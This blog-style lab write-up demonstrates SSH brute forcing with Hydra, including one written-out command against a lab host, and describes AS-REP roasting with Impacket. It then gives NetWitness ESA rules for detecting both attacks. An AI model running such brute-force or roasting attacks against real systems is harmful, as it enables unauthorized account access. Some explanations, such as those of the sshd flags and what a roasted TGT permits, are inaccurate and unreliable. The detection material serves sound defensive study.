INTRODUCTION

 

Hydra stands as a formidable tool in the arsenal of cybersecurity professionals and hackers alike, renowned for its prowess in brute-force attacks. Leveraging its versatile capabilities, Hydra can systematically probe login interfaces of various protocols and services, relentlessly attempting to crack passwords through exhaustive trial and error. Its adaptability extends across a wide spectrum, encompassing HTTP, HTTPS, FTP, SSH, Telnet, SMTP, and numerous other authentication mechanisms, making it a versatile option for penetrating diverse systems and applications.

 

Hydra traces its origins back to the early days of cybersecurity exploration and penetration testing, emerging as a vital tool in the arsenal of ethical hackers and security professionals. Developed by van Hauser, also known as Thorsten Schroeder, in the late 1990s, Hydra was conceived as an open-source project aimed at providing a robust and flexible solution for conducting brute-force attacks against various authentication systems. Originally designed to support a limited set of protocols, Hydra's capabilities rapidly expanded over the years, thanks to the contributions of an active community of developers and security enthusiasts. Its evolution mirrored the escalating sophistication of cybersecurity threats and the growing need for comprehensive testing tools to assess the resilience of digital defenses.

 

Today, Hydra stands as a testament to the collaborative spirit of the cybersecurity community, embodying years of refinement and innovation in the pursuit of enhancing digital security practices and fortifying systems against malicious intrusions.

 

This blog will also Cover AS-REP roasting where epitomizes a sophisticated attack vector within the realm of Active Directory environments, leveraging weaknesses in Kerberos authentication. This technique targets accounts configured with "Do not require Kerberos pre-authentication" enabled, allowing adversaries to request AS-REP (Authentication Service Response) tickets without presenting any valid credentials.

 

By exploiting this vulnerability, attackers can capture encrypted AS-REP tickets for targeted user accounts. When armed with a password list, attackers can then systematically decrypt these tickets offline, leveraging the captured hashes and the passwords contained within the list to compromise user accounts.

 

This method poses a significant threat, particularly in environments where weak or easily guessable passwords are prevalent. As organizations increasingly rely on Active Directory for authentication and access control, understanding and mitigating AS-REP Roasting attacks with password lists is paramount to maintaining robust cybersecurity defenses.

 

Brute Force

 

Brute forcing credentials represents a persistent and often effective method employed by attackers to gain unauthorized access to systems, accounts, or sensitive information. This technique involves systematically trying an exhaustive number of possible combinations of usernames and passwords until the correct credentials are discovered.

 

By leveraging automated tools like Hydra or specialized scripts, attackers can rapidly cycle through vast sets of potential passwords, exploiting weaknesses in authentication systems. Brute forcing is particularly potent against weak or commonly used passwords, highlighting the critical importance of robust password policies, multi-factor authentication, and other security measures to mitigate the risk of unauthorized access. Despite its simplicity, brute forcing remains a prevalent threat in the cybersecurity landscape, underscoring the ongoing need for vigilance and proactive defenses to safeguard against credential-based attacks.

 

 

Brute Force Attack

 

HYDRA Attack

 

A scan on the network will be to look for any ports or protocols that can be exploited and brute forced to gain initial access into the system.

 

 

NMAP Scan

 

In this case, we see that port 22 (SSH) is open. This is good news for attackers as this means that remote access to the device is enabled if the right credentials are entered.

 

Scan Result

 

The command entered below is to direct hydra to use a username list to run it against a password list (obtained from Rock You in Kali) and match each user to a password to find valid credentials which we can use to log in. In this case, hydra has discovered that we have a hit in one of the username and password list by the name of jack.

 

HYDRA brute-forcing

 

Command Entered:

hydra -L username_list.txt -P password_list.txt ssh://192.168.1.11

 

 

SSH into Compromised Account

 

We can see that we managed to gain Initial Access into the devices via the stolen credentials.

 

AS-REP Attack

An AS-REP attack with authentication to the Key Distribution Center (KDC) exploits vulnerabilities in the Kerberos authentication protocol used in Active Directory environments. Typically, when a user attempts to authenticate to a service, the client sends a request to the KDC for a Ticket Granting Ticket (TGT).

 

The KDC responds by encrypting a TGT using the user's password hash. However, certain accounts may be configured with the "Do not require Kerberos preauthentication" attribute enabled, meaning the KDC doesn't require the client to prove knowledge of the password before issuing the TGT.

 

In an AS-REP attack, an attacker can send a forged authentication request to the KDC for a TGT without providing valid credentials. The KDC, unaware of the absence of preauthentication, responds by encrypting a TGT using the user's password hash.

 

The attacker can then capture this encrypted TGT and attempt to crack it offline to retrieve the user's plaintext password, potentially gaining unauthorized access to the user's account. This attack underscores the importance of securing accounts and properly configuring authentication mechanisms within Active Directory environments to mitigate such vulnerabilities.

 

 

KDC Key Exchange

 

 

We will be using Impacket to carry out this attack. In an Impacket GETnpusers attack, adversaries exploit vulnerabilities in the way Active Directory handles certain types of Kerberos tickets. Specifically, this attack targets the Kerberos AS-REQ (Authentication Service Request) message sent by clients to the Key Distribution Center (KDC) to request service tickets.

 

By sending a forged AS-REQ message with specific flags, attackers can trick the KDC into providing a special type of ticket, known as a TGT (Ticket Granting Ticket), without presenting valid credentials. This TGT can then be used to request service tickets for any user in the domain, even without knowing their passwords. Impacket's GETnpusers tool automates this process, allowing attackers to quickly harvest TGTs and enumerate users within the domain.

 

 

AS-REP Attack

 

Analysis (Brute Force)

 

 

 Brute Force SSH logs captured on NetWitness system.

 

 

Brute Force SSH logs captured on NetWitness system.

 

From the 2 images above, we are able to see that there are a lot of SSH connection coming through in the form of “sshd.exe -y” and “sshd.exe -r”. The sshd.exe -y option is used to generate host keys for the OpenSSH server on Windows. When you run sshd.exe -y, it will create host key files if they don't already exist. The -R option is used with the sshd (OpenSSH server) to specify remote port forwarding.

 

Remote port forwarding allows a connection from the server to a remote client, creating a tunnel for the specified ports. In normal traffic, one or two ssh connections are normal, but, as we can see from the logs, there are hundreds of SSH connections coming in in a span of seconds.

 

Analysis (AS-REP)

 

In an AS-REP attack scenario with a username list, adversaries exploit vulnerabilities in Active Directory authentication to compromise user accounts. Armed with a list of usernames harvested through reconnaissance or other means, attackers systematically submit requests for AS-REP tickets for each user in the list. These tickets contain encrypted hashes of the user's password. Subsequently, attackers can offline decrypt these tickets using specialized tools and techniques, potentially uncovering weak or easily guessable passwords associated with the targeted user accounts.

 

AS-REP Roasting Enumeration

 

When a valid username is found to be part of the domain, the server will reply the client, which in this case is the attacker, with a AS-REP reply. This reply is then intercepted, and the hash of the user can be cracked offline giving the attacker an entry into the network.

 

Successful AS-REP from server

 

Possible Rules to Detect for SSH Brute Force

 

The rule created is to detect for SSH brute Force. Specific Meta keys are picked out to detect for anomalies within the network for a possible brute force attack on.

ESA Rule

 

Rule Syntax

 

 

Threshold set

@Name('Module_77b66f53_5fdc_4c8e_a05f_c926e780c3c4_Alert')         @Description('')         @RSAAlert(oneInSeconds=0)           SELECT * FROM Event(             /* Statement: SSH Brute Force */             (isOneOfIgnoreCase(filename_src,{ 'sshd.exe' }) AND isOneOfIgnoreCase(directory_dst,{ 'C:\\Windows\\System32:\\OpenSSH\\' }) AND isOneOfIgnoreCase(param_src,{ 'sshd.exe \"-R\"' }) AND isOneOfIgnoreCase(param_dst,{ 'sshd.exe \"-y\"' }))        )         ;

 

 

Rule Test

 

 

 

 

Possible Rules to Detect for AS-REP Roasting

The meta keys chosen for this rule is specifically to pick up on behaviour associated with AS_REP Roasting with enumeration within the network.

 

 

 

 

 

Rule syntax

 

 

Rule Test

 

 

 

module Module_65b620a6e4b0c8e3c269fd3e;                 @Name('Module_65b620a6e4b0c8e3c269fd3e_Alert')         @Description('')         @RSAAlert(oneInSeconds=0)           SELECT * FROM Event(             /* Statement: Suspected Domain Brute Force */             (isOneOfIgnoreCase(action,{ 'kerberos as request' }) AND error.toLowerCase() IN ( 'kdc err c principal unknown' ) AND ( 'kerberos as reply' != ALL( action ) ) AND ad_username_dst.toLowerCase() IN ( 'krbtgt' ) AND tcp_dstport IN ( 88 ))             OR             /* Statement: Successful Login */             (( 'kerberos as reply' = ANY( action ) ) AND ( 'kerberos as reply' = ANY( action ) ))                         ).win:time(1 Minutes)         MATCH_RECOGNIZE (         PARTITION BY ip_src         MEASURES E1 as e1_data , E2 as e2_data                                              PATTERN (E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1 E2* E1+ E2)         DEFINE         E1 as (isOneOfIgnoreCase(E1.action,{ 'kerberos as request' }) AND E1.error.toLowerCase() IN ( 'kdc err c principal unknown' ) AND ( 'kerberos as reply' != ALL( E1.action ) ) AND E1.ad_username_dst.toLowerCase() IN ( 'krbtgt' ) AND E1.tcp_dstport IN ( 88 )),         E2 as (( 'kerberos as reply' = ANY( E2.action ) ) AND ( 'kerberos as reply' = ANY( E2.action ) ))         );